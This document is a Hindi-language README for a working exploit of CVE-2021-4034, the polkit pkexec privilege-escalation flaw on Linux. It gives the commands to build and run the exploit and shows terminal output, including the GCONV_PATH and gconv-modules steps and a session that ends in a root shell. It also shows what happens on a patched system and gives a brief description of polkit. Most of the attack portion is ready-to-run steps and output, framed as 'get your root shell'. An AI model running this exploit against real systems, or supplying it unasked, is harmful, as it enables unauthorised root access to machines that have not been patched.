
CVE-2021-4034 के लिए एक्सप्लॉइट, जो polkit pkexec विशेषाधिकार वृद्धि भेद्यता है, जो कमजोर Linux सिस्टम पर रूट शेल प्रदान करता है।
बस make, ./cve-2021-4034 चलाएँ और अपना रूट शेल प्राप्त करें।
यदि शोषण काम कर रहा है तो आपको तुरंत रूट शेल मिल जाएगा:
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
अधिकांश सिस्टम पर polkit को अपडेट करने से शोषण पैच हो जाएगा, इसलिए आपको उपयोग विवरण मिलेगा और प्रोग्राम बाहर निकल जाएगा:
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
Polkit (पूर्व में PolicyKit) Unix-जैसे ऑपरेटिंग सिस्टम में सिस्टम-व्यापी विशेषाधिकारों को नियंत्रित करने के लिए एक घटक है। यह गैर-विशेषाधिकार प्राप्त प्रक्रियाओं के लिए विशेषाधिकार प्राप्त प्रक्रियाओं के साथ संवाद करने का एक संगठित तरीका प्रदान करता है। polkit का उपयोग करके pkexec कमांड के बाद इच्छित कमांड (रूट अनुमति के साथ) चलाकर उन्नत विशेषाधिकारों के साथ कमांड निष्पादित करना भी संभव है।